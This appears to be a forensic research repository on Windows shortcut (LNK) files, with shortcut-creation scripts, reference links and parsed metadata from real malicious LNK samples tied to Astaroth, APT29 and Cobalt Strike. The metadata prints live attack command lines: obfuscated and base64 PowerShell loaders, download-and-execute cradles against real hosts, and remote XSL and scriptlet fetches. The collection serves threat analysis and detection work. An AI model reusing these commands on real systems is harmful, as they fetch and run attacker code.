├── .gitattributes ├── README.md ├── astaroth.txt ├── foo2.tst ├── foo2.vbs ├── links.txt ├── lnk.zip ├── make_lnk.txt ├── notes.txt ├── other.txt └── toolmarks.txt /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # LNK 2 | 3 | foo2.vbs - VB script to create an LNK file for calc.exe 4 | 5 | foo2.tst - output of foo2.vbs 6 | 7 | make_lnk.txt - minimal LNK file to launch calc.exe 8 | 9 | lnk.zip - LNK parser updated 20220831 (EXE and Perl run-time DLL) -------------------------------------------------------------------------------- /astaroth.txt: -------------------------------------------------------------------------------- 1 | LNK file associated with Astaroth 2 | https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research 3 | 4 | Astaroth LNK: 5 | https://www.virustotal.com/gui/file/3a6c84b00170aea3028dcf9fbdeaaa5141468874573ce6797a1eba0025aad62f/details 6 | https://hybrid-analysis.com/sample/3a6c84b00170aea3028dcf9fbdeaaa5141468874573ce6797a1eba0025aad62f?environmentId=100 7 | 8 | Metadata: 9 | guid {00021401-0000-0000-c000-000000000046} 10 | mtime Sat Jul 16 11:42:42 2016 Z 11 | atime Sat Jul 16 11:42:42 2016 Z 12 | ctime Sat Jul 16 11:42:42 2016 Z 13 | basepath C:\Windows\System32\rundll32.exe 14 | shitemidlist My Computer/C:\/Windows/System32/rundll32.exe 15 | **Shell Items Details (times in UTC)** 16 | C:2016-07-16 06:04:26 M:2017-04-06 19:20:00 A:2017-04-06 19:20:00 Windows (9) 17 | C:2016-07-16 06:04:26 M:2017-04-06 23:52:58 A:2017-04-06 23:52:58 System32 (9) 18 | C:2016-07-16 11:42:44 M:2016-07-16 11:42:44 A:2016-07-16 11:42:44 rundll32.exe (9) 19 | vol_sn ECCD-85F4 20 | vol_type Fixed Disk 21 | commandline javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://hardx.thaieasydns.com/01/Seu7.sct"); 22 | iconfilename %SystemRoot%\system32\imageres.dll 23 | hotkey 0x244 24 | showcmd 0x1 25 | 26 | ***LinkFlags*** 27 | HasLinkTargetIDList|IsUnicode|HasLinkInfo|HasArguments|HasIconLocation|HasRelativePath 28 | 29 | 30 | ***KnownFolderDataBlock*** 31 | GUID : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7} 32 | Folder: CSIDL_SYSTEM 33 | 34 | ***TrackerDataBlock*** 35 | Machine ID : ideia 36 | New Droid ID Time : Thu Apr 6 19:51:48 2017 UTC 37 | New Droid ID Seq Num : 8849 38 | New Droid Node ID : 82:c2:28:09:30:bb 39 | Birth Droid ID Time : Thu Apr 6 19:51:48 2017 UTC 40 | Birth Droid ID Seq Num: 8849 41 | Birth Droid Node ID : 82:c2:28:09:30:bb 42 | -------------------------------------------------------------------------------- /foo2.tst: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/keydet89/LNK/8a2e7bc02503fa67f91d403dddf0ef0e1b3e7575/foo2.tst -------------------------------------------------------------------------------- /foo2.vbs: -------------------------------------------------------------------------------- 1 | set w = CreateObject("Wscript.shell") 2 | set l = w.CreateShortcut("\foo2.lnk") 3 | l.TargetPath = "c:\windows\system32\calc.exe" 4 | l.Save -------------------------------------------------------------------------------- /links.txt: -------------------------------------------------------------------------------- 1 | Links 2 | 3 | LNK binary format 4 | https://msdn.microsoft.com/en-us/library/dd871305.aspx 5 | 6 | Shell Item format specification 7 | https://github.com/libyal/libfwsi/blob/master/documentation/Windows%20Shell%20Item%20format.asciidoc 8 | 9 | Property Store format definitions 10 | https://github.com/libyal/libfwps/blob/master/documentation/Windows%20Property%20Store%20format.asciidoc 11 | 12 | Government warning that includes the use of LNK files: 13 | https://www.ncsc.gov.uk/news/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control 14 | 15 | 2017 Trend Micro blog post regarding the trend of using LNK files 16 | https://blog.trendmicro.com/trendlabs-security-intelligence/rising-trend-attackers-using-lnk-files-download-malware/ 17 | 18 | 2017 ThreatPost blog article regarding StuxNet and the use of LNK files 19 | https://threatpost.com/stuxnet-lnk-exploits-still-widely-circulated/125089/ 20 | 21 | 2015 Hexacorn blog post regarding the use of HotKeys in LNK files 22 | http://www.hexacorn.com/blog/2015/03/13/beyond-good-ol-run-key-part-29/ 23 | 24 | Links for creating LNKs (useful for toolmark testing): 25 | Tricky.lnk 26 | https://github.com/xillwillx/tricky.lnk 27 | 28 | https://www.uperesia.com/booby-trapped-shortcut-generator 29 | 30 | Thanks to Matt @ bitofhex: 31 | https://github.com/Plazmaz/LNKUp 32 | https://github.com/it-gorillaz/lnk2pwn 33 | -------------------------------------------------------------------------------- /lnk.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/keydet89/LNK/8a2e7bc02503fa67f91d403dddf0ef0e1b3e7575/lnk.zip -------------------------------------------------------------------------------- /make_lnk.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/keydet89/LNK/8a2e7bc02503fa67f91d403dddf0ef0e1b3e7575/make_lnk.txt -------------------------------------------------------------------------------- /notes.txt: -------------------------------------------------------------------------------- 1 | This file contains the metadata of several LNK files available online. 2 | 3 | The two "cozy" LNK files were retrieved as a result of this FireEye blog post: 4 | https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html 5 | 6 | LNK #1: 7 | file: d:\cases\cozy\cozy\coz 8 | 9 | guid {00021401-0000-0000-c000-000000000046} 10 | mtime Tue Jul 14 01:14:24 2009 Z 11 | atime Mon Jul 13 23:32:37 2009 Z 12 | ctime Mon Jul 13 23:32:37 2009 Z 13 | basepath C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 14 | description ds7002.pdf 15 | shitemidlist My Computer/C:\/Windows/System32/WindowsPowerShell/v1.0/powershell.exe 16 | **Shell Items Details (times in UTC)** 17 | C:2009-07-14 02:37:06 M:2016-02-16 18:50:36 A:2016-02-16 18:50:36 Windows (8) 18 | C:2009-07-14 02:37:08 M:2018-11-02 10:25:58 A:2018-11-02 10:25:58 System32 (8) 19 | C:2009-07-14 04:52:32 M:2009-07-14 04:52:32 A:2009-07-14 04:52:32 WindowsPowerShell (8) 20 | C:2009-07-14 04:52:32 M:2016-02-16 18:50:44 A:2016-02-16 18:50:44 v1.0 (8) 21 | C:2009-07-13 23:32:38 M:2009-07-14 01:14:26 A:2009-07-13 23:32:38 powershell.exe (8) 22 | vol_sn C4B2-BD1C 23 | vol_type Fixed Disk 24 | commandline -noni -ep bypass $zk='JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0ZW0gLVBhdGggJEVudjp0ZW1wIC1GaWx0ZXIgJHRiIC1SZWN1cnNlO2lmICgtbm90ICRvZSkge2V4aXR9W0lPLkRpcmVjdG9yeV06OlNldEN1cnJlbnREaXJlY3RvcnkoJG9lLkRpcmVjdG9yeU5hbWUpO30kdnp2aT1OZXctT2JqZWN0IElPLkZpbGVTdHJlYW0gJHRiLCdPcGVuJywnUmVhZCcsJ1JlYWRXcml0ZSc7JG9lPU5ldy1PYmplY3QgYnl0ZVtdKCR2Y3EtJHB0Z3QpOyRyPSR2enZpLlNlZWsoJHB0Z3QsW0lPLlNlZWtPcmlnaW5dOjpCZWdpbik7JHI9JHZ6dmkuUmVhZCgkb2UsMCwkdmNxLSRwdGd0KTskb2U9W0NvbnZlcnRdOjpGcm9tQmFzZTY0Q2hhckFycmF5KCRvZSwwLCRvZS5MZW5ndGgpOyR6az1bVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldFN0cmluZygkb2UpO2lleCAkems7';$fz='FromBase'+0x40+'String';$rhia=[Text.Encoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia; 25 | iconfilename C:\windows\system32\shell32.dll 26 | hotkey 0x0 27 | showcmd 0x7 28 | 29 | ***LinkFlags*** 30 | HasLinkTargetIDList|IsUnicode|HasExpIcon|HasLinkInfo|HasArguments|HasName|HasIconLocation|HasRelativePath 31 | 32 | ***PropertyStoreDataBlock*** 33 | SID: S-1-5-21-1764276529-1526541935-4264456457-1000 34 | 35 | ***KnownFolderDataBlock*** 36 | GUID : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7} 37 | Folder: CSIDL_SYSTEM 38 | 39 | ***TrackerDataBlock*** 40 | Machine ID : user-pc 41 | New Droid ID Time : Thu Oct 6 17:03:04 2016 UTC 42 | New Droid ID Seq Num : 13273 43 | New Droid Node ID : 08:00:27:92:24:e5 44 | Birth Droid ID Time : Thu Oct 6 17:03:04 2016 UTC 45 | Birth Droid ID Seq Num: 13273 46 | Birth Droid Node ID : 08:00:27:92:24:e5 47 | 48 | 49 | LNK #2 50 | file: d:\cases\cozy2\cozy2 51 | 52 | guid {00021401-0000-0000-c000-000000000046} 53 | mtime Tue Jul 14 01:14:24 2009 Z 54 | atime Mon Jul 13 23:32:37 2009 Z 55 | ctime Mon Jul 13 23:32:37 2009 Z 56 | basepath C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 57 | shitemidlist My Computer/C:\/Windows/System32/WindowsPowerShell/v1.0/powershell.exe 58 | **Shell Items Details (times in UTC)** 59 | C:2009-07-14 02:37:06 M:2016-02-16 18:50:36 A:2016-02-16 18:50:36 Windows (8) 60 | C:2009-07-14 02:37:08 M:2016-11-08 22:00:34 A:2016-11-08 22:00:34 System32 (8) 61 | C:2009-07-14 04:52:32 M:2009-07-14 04:52:32 A:2009-07-14 04:52:32 WindowsPowerShell (8) 62 | C:2009-07-14 04:52:32 M:2016-02-16 18:50:44 A:2016-02-16 18:50:44 v1.0 (8) 63 | C:2009-07-13 23:32:38 M:2009-07-14 01:14:26 A:2009-07-13 23:32:38 powershell.exe (8) 64 | vol_sn C4B2-BD1C 65 | vol_type Fixed Disk 66 | commandline -noni -ep bypass -win hidden $s = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('JG9zPTB4MDAwOWZkZGE7JG9lPTB4MDAwYTE5MTY7JGY9IjM3NDg2LXRoZS1zaG9ja2luZy10cnV0aC1hYm91dC1lbGVjdGlvbi1yaWdnaW5nLWluLWFtZXJpY2EucnRmLmxuayI7aWYgKC1ub3QoVGVzdC1QYXRoICRmKSl7JHggPSBHZXQtQ2hpbGRJdGVtIC1QYXRoICRFbnY6dGVtcCAtRmlsdGVyICRmIC1SZWN1cnNlO1tJTy5EaXJlY3RvcnldOjpTZXRDdXJyZW50RGlyZWN0b3J5KCR4LkRpcmVjdG9yeU5hbWUpO30kaWZkID0gTmV3LU9iamVjdCBJTy5GaWxlU3RyZWFtICRmLCdPcGVuJywnUmVhZCcsJ1JlYWRXcml0ZSc7JHggPSBOZXctT2JqZWN0IGJ5dGVbXSgkb2UtJG9zKTskaWZkLlNlZWsoJG9zLFtJTy5TZWVrT3JpZ2luXTo6QmVnaW4pOyRpZmQuUmVhZCgkeCwwLCRvZS0kb3MpOyR4PVtDb252ZXJ0XTo6RnJvbUJhc2U2NENoYXJBcnJheSgkeCwwLCR4Lkxlbmd0aCk7JHM9W1RleHQuRW5jb2RpbmddOjpBU0NJSS5HZXRTdHJpbmcoJHgpO2lleCAkczs='));iex $s; 67 | iconfilename C:\Windows\System32\shell32.dll 68 | hotkey 0x0 69 | showcmd 0x7 70 | 71 | ***LinkFlags*** 72 | HasLinkTargetIDList|IsUnicode|HasExpIcon|HasLinkInfo|HasArguments|HasIconLocation|HasRelativePath 73 | 74 | ***PropertyStoreDataBlock*** 75 | SID: S-1-5-21-1764276529-1526541935-4264456457-1000 76 | 77 | ***KnownFolderDataBlock*** 78 | GUID : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7} 79 | Folder: CSIDL_SYSTEM 80 | 81 | ***TrackerDataBlock*** 82 | Machine ID : user-pc 83 | New Droid ID Time : Thu Oct 6 17:03:04 2016 UTC 84 | New Droid ID Seq Num : 13273 85 | New Droid Node ID : 08:00:27:92:24:e5 86 | Birth Droid ID Time : Thu Oct 6 17:03:04 2016 UTC 87 | Birth Droid ID Seq Num: 13273 88 | Birth Droid Node ID : 08:00:27:92:24:e5 89 | 90 | 91 | https://twitter.com/DissectMalware/status/1043407573821677568 92 | https://www.hybrid-analysis.com/sample/695e03c97eaed0303c9527e579e69b1ba280c448476edcf97d7a289b439fa39a?environmentId=100 93 | MD5: 0b12bdcfa497422aedf092729325ff6d 94 | 95 | guid {00021401-0000-0000-c000-000000000046} 96 | description 44OFxmd8rhESizmd7i26IOKcvjd7gt6IFqcv 97 | shitemidlist My Computer/C:\/WINDOWS/system32/cmd.exe 98 | C:0 M:0 A:0 Z WINDOWS (9) 99 | C:0 M:0 A:0 Z system32 (9) 100 | C:0 M:0 A:0 Z cmd.exe (9) 101 | commandline /k start /MIN %SystemRoot%\\system32\\wbem\\WMIC.exe os get /format:"http://t9UHncbrj.iceyavod.com:25073/03/vv.xsl?13102507390dOIrmxm" && exit 102 | iconfilename %SystemRoot%\system32\imageres.dll 103 | hotkey 0x0 104 | showcmd 0x7 105 | 106 | ***LinkFlags*** 107 | HasLinkTargetIDList|IsUnicode|HasArguments|HasName|HasIconLocation 108 | 109 | ***PropertyStoreDataBlock*** 110 | SID: S-1-5-21-1051504378-1802116228-1550938009-1001 111 | 112 | ***KnownFolderDataBlock*** 113 | GUID : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7} 114 | Folder: CSIDL_SYSTEM 115 | 116 | Notes: No TrackerDataBlock, confirmed that time stamps in shell items are zero'd 117 | out. 118 | 119 | # updated 20220831 120 | https://malcat.fr/blog/lnk-forensic-and-config-extraction-of-a-cobalt-strike-beacon/ 121 | 122 | File: d:\cases\lnk2\cs.txt 123 | guid {00021401-0000-0000-c000-000000000046} 124 | mtime Sun Jun 12 14:46:28 2022 Z 125 | atime Thu Jun 30 04:21:18 2022 Z 126 | ctime Sun Jun 12 14:46:28 2022 Z 127 | workingdir E:\downloads 128 | basepath C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 129 | shitemidlist My Computer/C:\/Windows/System32/WindowsPowerShell/v1.0/powershell.exe 130 | **Shell Items Details (times in UTC)** 131 | C:2019-12-07 09:03:46 M:2022-06-30 02:09:28 A:2022-06-30 04:11:22 Windows (9) [179356/3] 132 | C:2019-12-07 09:03:46 M:2022-06-30 03:11:46 A:2022-06-30 04:11:56 System32 (9) [181379/3] 133 | C:2019-12-07 09:14:54 M:2019-12-07 09:14:54 A:2022-06-30 01:05:26 WindowsPowerShell (9) [182401/3] 134 | C:2019-12-07 09:14:54 M:2022-06-13 03:35:36 A:2022-06-30 03:03:40 v1.0 (9) [182402/3] 135 | C:2022-06-12 14:46:30 M:2022-06-12 14:46:30 A:2022-06-30 04:03:48 powershell.exe (9) 136 | vol_sn BA2E-9690 137 | vol_type Fixed Disk 138 | commandline -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://120.48.85.228:80/favicon'))" 139 | hotkey 0x0 140 | showcmd 0x1 141 | 142 | ***LinkFlags*** 143 | HasLinkTargetIDList|IsUnicode|HasWorkingDir|HasLinkInfo|HasArguments|EnableTargetMetadata 144 | 145 | ***PropertyStoreDataBlock*** 146 | GUID/ID pairs: 147 | {28636aa6-953d-11d2-b5d6-00c04fd918d0}/30 ParsingPath: E:\downloads\Dû÷N1→ éYUO(W*N♫zAPP 148 | Nî[►bGlù{♣n4⌂▼ .pdf 149 | {446d16b1-8dad-4870-a748-402ea43d788c}/104 VolumeID: {a577bd74-42b7-4ee4-998a-0c216bb8c11f} 150 | {b725f130-47ef-101a-a5f1-02608c9eebac}/10 ItemNameDisplay: Dû÷N1→ éYUO(W*N♫zAPP 151 | Nî[►bGlù{♣n4⌂▼ .pdf 152 | {b725f130-47ef-101a-a5f1-02608c9eebac}/12 Size: 232486 153 | {b725f130-47ef-101a-a5f1-02608c9eebac}/14 DateModified: Thu Jun 30 03:22:00 2022 Z 154 | {b725f130-47ef-101a-a5f1-02608c9eebac}/15 DateCreated : Thu Jun 30 03:21:58 2022 Z 155 | {b725f130-47ef-101a-a5f1-02608c9eebac}/4 ItemType: Microsoft Edge PDF Document 156 | {e3e0584c-b788-4a5a-bb20-7f5a44c9acdd}/6 ItemFolderPathDisplay: E:\♂N}Å 157 | 158 | ***KnownFolderDataBlock*** 159 | GUID : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7} 160 | Folder: CSIDL_SYSTEM 161 | 162 | ***TrackerDataBlock*** 163 | Machine ID : desktop-3l400cr 164 | New Droid ID Time : Thu Jun 30 02:09:19 2022 UTC 165 | New Droid ID Seq Num : 12611 166 | New Droid Node ID : 00:50:56:c0:00:08 167 | Birth Droid ID Time : Thu Jun 30 02:09:19 2022 UTC 168 | Birth Droid ID Seq Num: 12611 169 | Birth Droid Node ID : 00:50:56:c0:00:08 -------------------------------------------------------------------------------- /other.txt: -------------------------------------------------------------------------------- 1 | Metadata from weaponized LNK files can provide insight into the actor's development 2 | environment. The SID provides insight into the user account used, and can be used as 3 | a search string (as well as in a Yara rule). The volume serial number, machine ID (aka, 4 | NetBIOS name), and the node ID (aka, MAC address) can also be used in a Yara rule. 5 | 6 | ------------------------------------------------------------------------------------- 7 | https://www.virustotal.com/gui/file/3b4ec70681e528663dee39c5c6ebceec2b7ddf09707a78df20cae3b7b807fac5/detection 8 | MD5: 5d357f666e7727b18f8150d53d28d257 9 | 10 | Metadata: 11 | guid {00021401-0000-0000-c000-000000000046} 12 | mtime Wed Apr 11 23:35:27 2018 Z 13 | atime Wed Apr 11 23:35:27 2018 Z 14 | ctime Wed Apr 11 23:35:27 2018 Z 15 | workingdir %SYSTEMROOT%\System32\WindowsPowerShell\v1.0 16 | basepath C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 17 | description AVI 18 | shitemidlist My Computer/C:\/Windows/System32/WindowsPowerShell/v1.0/powershell.exe 19 | **Shell Items Details (times in UTC)** 20 | C:2018-04-11 21:04:34 M:2018-11-16 21:29:56 A:2018-11-16 21:29:56 Windows (9) 21 | C:2018-04-11 21:04:34 M:2018-11-21 17:32:02 A:2018-11-21 17:32:02 System32 (9) 22 | C:2018-04-11 23:38:22 M:2018-04-11 23:38:22 A:2018-06-28 23:05:46 WindowsPowerShell (9) 23 | C:2018-04-11 23:38:22 M:2018-06-28 23:04:20 A:2018-06-28 23:04:20 v1.0 (9) 24 | C:2018-04-11 23:35:28 M:2018-04-11 23:35:28 A:2018-04-11 23:35:28 powershell.exe (9) 25 | vol_sn CA05-2569 26 | vol_type Fixed Disk 27 | commandline -NoPr -WINd 1 -eXEc ByP iex ("$( SeT-ITeM 'VariaBle:OFS' '')"+[StRING][CHAr[]] (73 ,69, 88, 40, 78,101 , 119 , 45, 79 ,98,106,101 , 99,116,32 ,83,121,115 ,116 ,101 ,109, 46, 78 , 101,116,46,87 , 101, 98 ,67,108 ,105 , 101 , 110 , 116, 41,46 , 68,111 ,119 ,110, 108, 111,97 , 100, 83 , 116 ,114,105,110,103 ,40, 39, 104 ,116 ,116,112,58 ,47 ,47,107 ,108 ,105, 115 ,46 ,105 , 99 , 117,47 ,49 , 39,41)+"$(SEt-VARiAbLe 'OfS' ' ' ) ") 28 | iconfilename C:\WINDOWS\System32\imageres.dll 29 | hotkey 0x0 30 | showcmd 0x7 31 | 32 | ***LinkFlags*** 33 | HasLinkTargetIDList|IsUnicode|HasWorkingDir|HasExpIcon|HasLinkInfo|HasArguments|HasName|HasIconLocation|HasRelativePath 34 | 35 | ***PropertyStoreDataBlock*** 36 | GUID/ID pairs: 37 | {446d16b1-8dad-4870-a748-402ea43d788c}/104 38 | {46588ae2-4cbc-4338-bbfc-139326986dce}/4 SID: S-1-5-21-1607665944-3235443811-1991609163-1001 39 | 40 | ***KnownFolderDataBlock*** 41 | GUID : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7} 42 | Folder: CSIDL_SYSTEM 43 | 44 | ***TrackerDataBlock*** 45 | Machine ID : x10-slim 46 | New Droid ID Time : Sun Jul 29 22:57:38 2018 UTC 47 | New Droid ID Seq Num : 5969 48 | New Droid Node ID : e8:9e:b4:3a:a3:ea 49 | Birth Droid ID Time : Sun Jul 29 22:57:38 2018 UTC 50 | Birth Droid ID Seq Num: 5969 51 | Birth Droid Node ID : e8:9e:b4:3a:a3:ea 52 | 53 | ------------------------------------------------------------------------------------- 54 | https://www.virustotal.com/gui/file/695e03c97eaed0303c9527e579e69b1ba280c448476edcf97d7a289b439fa39a/detection 55 | https://hybrid-analysis.com/sample/695e03c97eaed0303c9527e579e69b1ba280c448476edcf97d7a289b439fa39a?environmentId=100 56 | MD5: 0b12bdcfa497422aedf092729325ff6d 57 | 58 | Note: In this LNK file, the time stamps within the shell items were visually/manually 59 | verified as being zero'd out. There also appear to be other modifications to the file, 60 | as well, as well as a description field. 61 | 62 | Metadata: 63 | guid {00021401-0000-0000-c000-000000000046} 64 | description 44OFxmd8rhESizmd7i26IOKcvjd7gt6IFqcv 65 | shitemidlist My Computer/C:\/WINDOWS/system32/cmd.exe 66 | **Shell Items Details (times in UTC)** 67 | C:0 M:0 A:0 WINDOWS (9) 68 | C:0 M:0 A:0 system32 (9) 69 | C:0 M:0 A:0 cmd.exe (9) 70 | commandline /k start /MIN %SystemRoot%\\system32\\wbem\\WMIC.exe os get /format:"http://t9UHncbrj.iceyavod.com:25073/03/vv.xsl?13102507390dOIrmxm" && exit 71 | iconfilename %SystemRoot%\system32\imageres.dll 72 | hotkey 0x0 73 | showcmd 0x7 74 | 75 | ***LinkFlags*** 76 | HasLinkTargetIDList|IsUnicode|HasArguments|HasName|HasIconLocation 77 | 78 | ***PropertyStoreDataBlock*** 79 | GUID/ID pairs: 80 | {46588ae2-4cbc-4338-bbfc-139326986dce}/4 SID: S-1-5-21-1051504378-1802116228-1550938009-1001 81 | 82 | ***KnownFolderDataBlock*** 83 | GUID : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7} 84 | Folder: CSIDL_SYSTEM 85 | 86 | ------------------------------------------------------------------------------------- 87 | LNK avialable for download: 88 | https://iris-h.services/#/pages/workbench/19cd922cac02acd24b7b6c3d01df5b0b29f52eab 89 | 90 | This LNK file is interesting, in that the actual command run is appended to the end 91 | of the LNK file itself. In this case, the word "dikona" is used throughout the script. 92 | Windows Defender detects that LNK file as BITS abuse, as the embedded script uses 93 | bitsadmin.exe to download a file. 94 | 95 | MD5: 877a283be8cd033a144f9d3324e7a0b0 96 | 97 | Metadata: 98 | guid {00021401-0000-0000-c000-000000000046} 99 | mtime Tue Jul 14 01:39:20 2009 Z 100 | atime Mon Jul 13 23:49:07 2009 Z 101 | ctime Mon Jul 13 23:49:07 2009 Z 102 | basepath C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 103 | shitemidlist My Computer/C:\/Windows/System32/WindowsPowerShell/v1.0/powershell.exe 104 | **Shell Items Details (times in UTC)** 105 | C:2009-07-14 03:20:10 M:2018-09-07 06:18:28 A:2018-09-07 06:18:28 Windows (8) 106 | C:2009-07-14 03:20:12 M:2018-09-07 06:12:28 A:2018-09-07 06:12:28 System32 (8) 107 | C:2009-07-14 05:32:40 M:2009-07-14 05:32:40 A:2009-07-14 05:32:40 WindowsPowerShell (8) 108 | C:2009-07-14 05:32:40 M:2016-12-19 11:50:30 A:2016-12-19 11:50:30 v1.0 (8) 109 | C:2009-07-13 23:49:08 M:2009-07-14 01:39:22 A:2009-07-13 23:49:08 powershell.exe (8) 110 | vol_sn 9CBC-E47E 111 | vol_type Fixed Disk 112 | commandline -ep bypass -c "&{powershell -w"in hi"d"den -c {$g=findstr /s dikona $env:userprofile\*.lnk;powershell -c $g}}" 113 | iconfilename shell32.dll 114 | hotkey 0x73 115 | showcmd 0x7 116 | 117 | ***LinkFlags*** 118 | HasLinkTargetIDList|IsUnicode|HasLinkInfo|HasArguments|HasIconLocation|HasRelativePath 119 | 120 | ***PropertyStoreDataBlock*** 121 | GUID/ID pairs: 122 | {46588ae2-4cbc-4338-bbfc-139326986dce}/4 SID: S-1-5-21-2287413414-4262531481-1086768478-1000 123 | 124 | ***KnownFolderDataBlock*** 125 | GUID : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7} 126 | Folder: CSIDL_SYSTEM 127 | 128 | ***TrackerDataBlock*** 129 | Machine ID : pc 130 | New Droid ID Time : Fri Sep 9 16:24:17 2016 UTC 131 | New Droid ID Seq Num : 7251 132 | New Droid Node ID : 08:d4:0c:47:f8:73 133 | Birth Droid ID Time : Fri Sep 9 16:24:17 2016 UTC 134 | Birth Droid ID Seq Num: 7251 135 | Birth Droid Node ID : 08:d4:0c:47:f8:73 136 | 137 | ------------------------------------------------------------------------------------- 138 | Below is the metadata for "make_lnk.lnk", a custom crafted LNK file that includes only the 139 | minimum required for a functioning LNK file. The LNK file metadata was further modified to 140 | remove time stamps from the shell items, as well as modify the version number for the shell 141 | items. 142 | 143 | The file can be found here: https://github.com/keydet89/LNK/blob/master/make_lnk.txt 144 | Note that the file extension was changed to "txt". 145 | 146 | File: d:\cases\lnk\make_lnk.lnk 147 | guid {00021401-0000-0000-c000-000000000046} 148 | shitemidlist My Computer/C:\/Windows/System32 /calc.exe 149 | **Shell Items Details (times in UTC)** 150 | C:0 M:0 A:0 Windows (10) 151 | C:0 M:0 A:0 System32 (10) 152 | C:0 M:0 A:0 calc.exe (10) 153 | hotkey 0x0 154 | showcmd 0x1 155 | 156 | ***LinkFlags*** 157 | HasLinkTargetIDList|IsUnicode -------------------------------------------------------------------------------- /toolmarks.txt: -------------------------------------------------------------------------------- 1 | This file illustrates several native means for creating shortcuts on Windows systems, 2 | and the metadata extracted from the resulting Windows shortcut files. 3 | 4 | ------------------------------------------------------------------------------------- 5 | Visual Basic Script #1 6 | 7 | set w = CreateObject("Wscript.shell") 8 | set l = w.CreateShortcut("\foo.lnk") 9 | l.WindowStyle = 4 10 | l.TargetPath = "c:\windows\system32\calc.exe" 11 | l.Hotkey = "Captial" 12 | l.Save 13 | 14 | Metadata: 15 | guid {00021401-0000-0000-c000-000000000046} 16 | mtime Wed Apr 11 23:34:36 2018 Z 17 | atime Wed Apr 11 23:34:36 2018 Z 18 | ctime Wed Apr 11 23:34:36 2018 Z 19 | basepath C:\Windows\System32\calc.exe 20 | shitemidlist My Computer/C:\/Windows/System32/calc.exe 21 | **Shell Items Details (times in UTC)** 22 | C:2018-04-11 21:04:34 M:2018-08-14 20:41:02 A:2018-08-14 20:41:02 Windows (9) 23 | C:2018-04-11 21:04:34 M:2018-09-12 21:49:36 A:2018-09-12 21:49:36 System32 (9) 24 | C:2018-04-11 23:34:38 M:2018-04-11 23:34:38 A:2018-04-11 23:34:38 calc.exe (9) 25 | vol_sn 22D3-06AE 26 | vol_type Fixed Disk 27 | hotkey 0x14 28 | showcmd 0x4 29 | 30 | ***LinkFlags*** 31 | HasLinkTargetIDList|IsUnicode|HasLinkInfo|HasRelativePath 32 | 33 | ***PropertyStoreDataBlock*** 34 | GUID/ID pairs: 35 | {446d16b1-8dad-4870-a748-402ea43d788c}/104 36 | {46588ae2-4cbc-4338-bbfc-139326986dce}/4 SID: S-1-5-21-3855314428-4085452759-4066589348-1000 37 | 38 | ***KnownFolderDataBlock*** 39 | GUID : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7} 40 | Folder: CSIDL_SYSTEM 41 | 42 | ***TrackerDataBlock*** 43 | Machine ID : enzo 44 | New Droid ID Time : Tue Sep 18 10:39:24 2018 UTC 45 | New Droid ID Seq Num : 7175 46 | New Droid Node ID : 5c:26:0a:24:29:6f 47 | Birth Droid ID Time : Tue Sep 18 10:39:24 2018 UTC 48 | Birth Droid ID Seq Num: 7175 49 | Birth Droid Node ID : 5c:26:0a:24:29:6f 50 | 51 | ------------------------------------------------------------------------------------- 52 | Visual Basic Script #2 53 | 54 | set w = CreateObject("Wscript.shell") 55 | set l = w.CreateShortcut("\foo2.lnk") 56 | l.TargetPath = "c:\windows\system32\calc.exe" 57 | l.Save 58 | 59 | Metadata: 60 | guid {00021401-0000-0000-c000-000000000046} 61 | mtime Wed Apr 11 23:34:36 2018 Z 62 | atime Wed Apr 11 23:34:36 2018 Z 63 | ctime Wed Apr 11 23:34:36 2018 Z 64 | basepath C:\Windows\System32\calc.exe 65 | shitemidlist My Computer/C:\/Windows/System32/calc.exe 66 | **Shell Items Details (times in UTC)** 67 | C:2018-04-11 21:04:34 M:2018-10-11 21:39:08 A:2018-10-11 21:39:08 Windows (9) 68 | C:2018-04-11 21:04:34 M:2018-12-20 22:46:22 A:2018-12-20 22:46:22 System32 (9) 69 | C:2018-04-11 23:34:38 M:2018-04-11 23:34:38 A:2018-04-11 23:34:38 calc.exe (9) 70 | vol_sn 22D3-06AE 71 | vol_type Fixed Disk 72 | hotkey 0x14 73 | showcmd 0x4 74 | 75 | ***LinkFlags*** 76 | HasLinkTargetIDList|IsUnicode|HasLinkInfo|HasRelativePath 77 | 78 | ***PropertyStoreDataBlock*** 79 | GUID/ID pairs: 80 | {446d16b1-8dad-4870-a748-402ea43d788c}/104 81 | {46588ae2-4cbc-4338-bbfc-139326986dce}/4 SID: S-1-5-21-3855314428-4085452759-4066589348-1000 82 | 83 | ***KnownFolderDataBlock*** 84 | GUID : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7} 85 | Folder: CSIDL_SYSTEM 86 | 87 | ***TrackerDataBlock*** 88 | Machine ID : enzo 89 | New Droid ID Time : Tue Sep 18 10:39:24 2018 UTC 90 | New Droid ID Seq Num : 7175 91 | New Droid Node ID : 